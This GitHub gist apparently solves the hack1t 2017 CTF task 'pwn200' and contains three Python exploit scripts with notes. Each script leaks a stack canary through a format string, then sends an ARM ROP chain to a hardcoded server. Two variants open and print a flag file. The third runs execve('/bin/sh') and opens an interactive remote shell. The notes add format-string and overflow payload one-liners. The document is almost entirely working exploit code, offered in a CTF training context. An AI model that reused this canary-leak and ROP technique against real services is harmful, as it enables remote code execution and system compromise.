Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Solution to pwn200 task of hack1t 2017 CTF :) (I wanted to practice ROP, so I did it opening and reading the flag file to finally write it to stdout and exit)
import socket
from struct import pack
def p(x):
return pack('<L', x)
s = socket.socket(
socket.AF_INET, socket.SOCK_STREAM)
s.connect(("165.227.98.55", 3333))
#s.connect(("192.168.1.141", 3333))
data = s.recv(1000)
print data
# Leak stack cookie
s.send("%517$p\n")
while str.find(data, "FIGHT>") == -1:
data += s.recv(1000)
print data
stackcookie = str.find(data, "I need your clothes")
stackcookie = data[stackcookie-8:stackcookie]
print "COOKIE: ", stackcookie
rop = "A"*1024
rop += p(int(stackcookie, 16))
rop += 'A'*12
BSS = 0x99ed8
flagFile = "/home/pwn200/flag.txt"
# read(stdin=0x0, bss=0x99ed8, len(flagFile))
rop += p(0x70068) # pop {r0, lr}; bx lr;
rop += p(0x0) # r0
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(BSS) # r1
# now we have to set r2=len(flagFile); there is no direct rop, so we have to set r5 and then r2=r5
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(len(flagFile)) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# r0 = open(BSS="/home/pwn200/flag.txt", O_RDONLY=0x0000, 0x0)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(BSS) # r0
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(0x0) # r1
# now we have to set r2=mode=0x0; there is no direct rop, so we have to set r5 and then r2=r5
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(0x0) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x5=open
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x5) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# read(fd=r0, BSS, 0x40)
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(BSS) # r1
# now we have to set r2=count=0x40; there is no direct rop, so we have to set r5 and then r2=r5
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(0x40) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# we have bss=flag, now let's write to stdout
# r0 = write(stdout=0x1, BSS, 0x40)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x1) # r0
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(BSS) # r1
# now we have to set r2=count=0x40; there is no direct rop, so we have to set r5 and then r2=r5
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(0x40) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x4=write
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x4) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# call exit; we have to call the syscall with r7=0x1=exit
# exit(0x0)
rop += p(0x70068) # pop {r0, lr}; bx lr;
rop += p(0x0) # r0
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x1) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
s.send(rop)
s.send(flagFile)
data = s.recv(1000)
print data
s.close()
'''
hack1t - pwn200
=================
In CHECK there is a Format String.
The Stack Canary check:
0x000105e0 cmp r2, r3 -> r2 = 0x41... r3 = 0x6688b100 = \x00\xb1\x88\x66
The stack cookie is in the 258 position
python -c "print '%llx.'*258 + '\n' + 'A'*7000" > exp
The stack cookie is in the 3829 position in our stack smashing:
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + 'BBBB'" > exp
python -c "print '%x.%x.%x.%x.%x.%x ' + '\n' + 'A'*2000" | ./pwn200
main: 0x00010604
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + '\x04\x06\x01\x00'" > exp
ROP:
Syscall:
0x0002286c: svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
'''
# Second solution; I use other ROP gadgets to set r0,r1,r2 (arguments) easier :)
import socket
from struct import pack
def p(x):
return pack('<L', x)
s = socket.socket(
socket.AF_INET, socket.SOCK_STREAM)
s.connect(("165.227.98.55", 3333))
#s.connect(("192.168.1.141", 3333))
data = s.recv(1000)
print data
# Leak stack cookie
s.send("%517$p\n")
while str.find(data, "FIGHT>") == -1:
data += s.recv(1000)
print data
stackcookie = str.find(data, "I need your clothes")
stackcookie = data[stackcookie-8:stackcookie]
print "COOKIE: ", stackcookie
rop = 'A'*1024
rop += p(int(stackcookie, 16))
rop += 'A'*12
BSS = 0x99ed8
flagFile = "/home/pwn200/flag.txt"
# read(stdin=0x0, bss=0x99ed8, len(flagFile))
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(0x0) # r0
rop += p(BSS) # r1
rop += p(len(flagFile)) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# r0 = open(BSS="/home/pwn200/flag.txt", O_RDONLY=0x0000, 0x0)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(BSS) # r0
rop += p(0x0) # r1
rop += p(0x0) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0x5=open
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x5) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# read(fd=r0, BSS, 0x40)
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(BSS) # r1
# now we have to set r2=count=0x40; there is no direct rop, so we have to set r5 and then r2=r5
# we use it because we cannot loose r0 value (fd)!!
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(0x40) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# we have bss=flag, now let's write to stdout
# write(stdout=0x1, BSS, 0x40)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(0x1) # r0
rop += p(BSS) # r1
rop += p(0x40) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0x4=write
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x4) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# call exit; we have to call the syscall with r7=0x1=exit
# exit(0x0)
rop += p(0x70068) # pop {r0, lr}; bx lr;
rop += p(0x0) # r0
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x1) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
s.send(rop)
s.send(flagFile)
data = s.recv(1000)
print data
s.close()
'''
hack1t - pwn200
=================
In CHECK there is a Format String.
The Stack Canary check:
0x000105e0 cmp r2, r3 -> r2 = 0x41... r3 = 0x6688b100 = \x00\xb1\x88\x66
The stack cookie is in the 258 position
python -c "print '%llx.'*258 + '\n' + 'A'*7000" > exp
The stack cookie is in the 3829 position in our stack smashing:
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + 'BBBB'" > exp
python -c "print '%x.%x.%x.%x.%x.%x ' + '\n' + 'A'*2000" | ./pwn200
main: 0x00010604
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + '\x04\x06\x01\x00'" > exp
ROP:
Syscall:
0x0002286c: svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
'''
import socket
from struct import pack
import telnetlib
def p(x):
return pack('<L', x)
s = socket.socket(
socket.AF_INET, socket.SOCK_STREAM)
s.connect(("165.227.98.55", 3333))
#s.connect(("192.168.1.141", 3333))
data = s.recv(1000)
print data
# Leak stack cookie
s.send("%517$p\n")
while str.find(data, "FIGHT>") == -1:
data += s.recv(1000)
print data
stackcookie = str.find(data, "I need your clothes")
stackcookie = data[stackcookie-8:stackcookie]
print "COOKIE: ", stackcookie
rop = 'A'*1024
rop += p(int(stackcookie, 16))
rop += 'A'*12
BSS = 0x99ed8
filepath = "/bin/sh"
# read(stdin=0x0, bss=0x99ed8, len(flagFile))
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(0x0) # r0
rop += p(BSS) # r1
rop += p(len(filepath)) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# execve(BSS, args=0x0, envp=0x0)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(BSS) # r0
rop += p(0x0) # r1
rop += p(0x0) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0xb=execve
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0xb) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
s.send(rop)
s.send(filepath)
t = telnetlib.Telnet()
t.sock = s
t.interact()
'''
hack1t - pwn200
=================
In CHECK there is a Format String.
The Stack Canary check:
0x000105e0 cmp r2, r3 -> r2 = 0x41... r3 = 0x6688b100 = \x00\xb1\x88\x66
The stack cookie is in the 258 position
python -c "print '%llx.'*258 + '\n' + 'A'*7000" > exp
The stack cookie is in the 3829 position in our stack smashing:
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + 'BBBB'" > exp
python -c "print '%x.%x.%x.%x.%x.%x ' + '\n' + 'A'*2000" | ./pwn200
main: 0x00010604
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + '\x04\x06\x01\x00'" > exp
ROP:
Syscall:
0x0002286c: svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.